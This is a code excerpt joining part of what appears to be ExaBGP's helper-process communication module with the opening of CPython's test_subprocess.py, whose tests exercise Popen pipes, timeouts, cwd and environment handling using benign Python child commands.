self.fds = [self._process[process].stdout.fileno() for process in self._process]
def received(self):
consumed_data = False
for process in list(self._process):
try:
proc = self._process[process]
poll = proc.poll()
poller = select.poll()
poller.register(
proc.stdout, select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLNVAL | select.POLLERR
)
ready = False
for _, event in poller.poll(0):
if event & select.POLLIN or event & select.POLLPRI:
ready = True
elif event & select.POLLHUP or event & select.POLLERR or event & select.POLLNVAL:
self._handle_problem(process)
if not ready:
continue
try:
# Calling next() on Linux and OSX works perfectly well
# but not on OpenBSD where it always raise StopIteration
# and only read() works (not even readline)
buf = str_ascii(proc.stdout.read(16384))
if buf == '' and poll is not None:
# if proc.poll() is None then
# process is fine, we received an empty line because
# we're doing .read() on a non-blocking pipe and
# the process maybe has nothing to send yet
self._handle_problem(process)
continue
raw = self._buffer.get(process, '') + buf
while '\n' in raw:
line, raw = raw.split('\n', 1)
line = line.rstrip()
consumed_data = True
self.logger.debug('command from process %s : %s ' % (process, line), 'process')
yield (process, formated(line))
self._buffer[process] = raw
except IOError as exc:
if not exc.errno or exc.errno in error.fatal:
# if the program exits we can get an IOError with errno code zero !
self._handle_problem(process)
elif exc.errno in error.block:
# we often see errno.EINTR: call interrupted and
# we most likely have data, we will try to read them a the next loop iteration
pass
else:
self.logger.debug('unexpected errno received from forked process (%s)' % errstr(exc), 'process')
continue
except StopIteration:
if not consumed_data:
self._handle_problem(process)
continue
# proc.poll returns None if the process is still fine
# -[signal], like -15, if the process was terminated
if poll is not None:
self._handle_problem(process)
return
except KeyError:
pass
except (subprocess.CalledProcessError, OSError, ValueError):
self._handle_problem(process)
def write(self, process, string, neighbor=None):
if string is None:
return True
# XXX: FIXME: This is potentially blocking
while True:
try:
self._process[process].stdin.write(bytes_ascii('%s\n' % string))
except IOError as exc:
self._broken.append(process)
if exc.errno == errno.EPIPE:
self._broken.append(process)
self.logger.debug('issue while sending data to our helper program', 'process')
raise ProcessError()
else:
# Could it have been caused by a signal ? What to do.
self.logger.debug(
'error received while sending data to helper program, retrying (%s)' % errstr(exc), 'process'
)
continue
break
try:
self._process[process].stdin.flush()
except IOError as exc:
# AFAIK, the buffer should be flushed at the next attempt.
self.logger.debug(
'error received while FLUSHING data to helper program, retrying (%s)' % errstr(exc), 'process'
)
return True
def _answer(self, service, string, force=False):
if force or self.ack:
self.logger.debug('responding to %s : %s' % (service, string.replace('\n', '\\n')), 'process')
self.write(service, string)
def answer_done(self, service):
self._answer(service, Answer.done)
def answer_error(self, service):
self._answer(service, Answer.error)
def _notify(self, neighbor, event):
for process in neighbor.api[event]:
yield process
# do not do anything if silenced
# no-self-argument
def silenced(function):
def closure(self, *args):
if self.silence:
return
return function(self, *args)
return closure
# invalid-name
@silenced
def up(self, neighbor):
for process in self._notify(neighbor, 'neighbor-changes'):
self.write(process, self._encoder[process].up(neighbor), neighbor)
@silenced
def connected(self, neighbor):
for process in self._notify(neighbor, 'neighbor-changes'):
self.write(process, self._encoder[process].connected(neighbor), neighbor)
@silenced
def down(self, neighbor, reason):
for process in self._notify(neighbor, 'neighbor-changes'):
self.write(process, self._encoder[process].down(neighbor, reason), neighbor)
@silenced
def negotiated(self, neighbor, negotiated):
for process in self._notify(neighbor, 'negotiated'):
self.write(process, self._encoder[process].negotiated(neighbor, negotiated), neighbor)
@silenced
def fsm(self, neighbor, fsm):
for process in self._notify(neighbor, 'fsm'):
self.write(process, self._encoder[process].fsm(neighbor, fsm), neighbor)
@silenced
def signal(self, neighbor, signal):
for process in self._notify(neighbor, 'signal'):
self.write(process, self._encoder[process].signal(neighbor, signal), neighbor)
@silenced
def packets(self, neighbor, direction, category, negotiated, header, body):
for process in self._notify(neighbor, '%s-packets' % direction):
self.write(
process,
self._encoder[process].packets(neighbor, direction, category, negotiated, header, body),
neighbor,
)
@silenced
def notification(self, neighbor, direction, code, subcode, data, header, body):
for process in self._notify(neighbor, 'neighbor-changes'):
self.write(
process,
self._encoder[process].notification(neighbor, direction, code, subcode, data, header, body),
neighbor,
)
@silenced
def message(self, message_id, neighbor, direction, message, negotiated, header, *body):
self._dispatch[message_id](self, neighbor, direction, message, negotiated, header, *body)
# registering message functions
# no-self-argument
def register_process(message_id, storage=_dispatch):
def closure(function):
def wrap(*args):
function(*args)
storage[message_id] = wrap
return wrap
return closure
# notifications are handled in the loop as they use different arguments
@register_process(Message.CODE.OPEN)
def _open(self, peer, direction, message, negotiated, header, body):
for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.OPEN.SHORT)):
self.write(process, self._encoder[process].open(peer, direction, message, negotiated, header, body), peer)
@register_process(Message.CODE.UPDATE)
def _update(self, peer, direction, update, negotiated, header, body):
for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.UPDATE.SHORT)):
self.write(process, self._encoder[process].update(peer, direction, update, negotiated, header, body), peer)
@register_process(Message.CODE.NOTIFICATION)
def _notification(self, peer, direction, message, negotiated, header, body):
for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.NOTIFICATION.SHORT)):
self.write(
process, self._encoder[process].notification(peer, direction, message, negotiated, header, body), peer
)
# unused-argument, must keep the API
@register_process(Message.CODE.KEEPALIVE)
def _keepalive(self, peer, direction, keepalive, negotiated, header, body):
for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.KEEPALIVE.SHORT)):
self.write(process, self._encoder[process].keepalive(peer, direction, negotiated, header, body), peer)
@register_process(Message.CODE.ROUTE_REFRESH)
def _refresh(self, peer, direction, refresh, negotiated, header, body):
for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.ROUTE_REFRESH.SHORT)):
self.write(
process, self._encoder[process].refresh(peer, direction, refresh, negotiated, header, body), peer
)
@register_process(Message.CODE.OPERATIONAL)
def _operational(self, peer, direction, operational, negotiated, header, body):
for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.OPERATIONAL.SHORT)):
self.write(
process,
self._encoder[process].operational(
peer, direction, operational.category, operational, negotiated, header, body
),
peer,
)
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
from test.support import FakePath
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import _testcapi
except ImportError:
_testcapi = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
'__PYVENV_LAUNCHER__' in n or # MacOS framework build
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
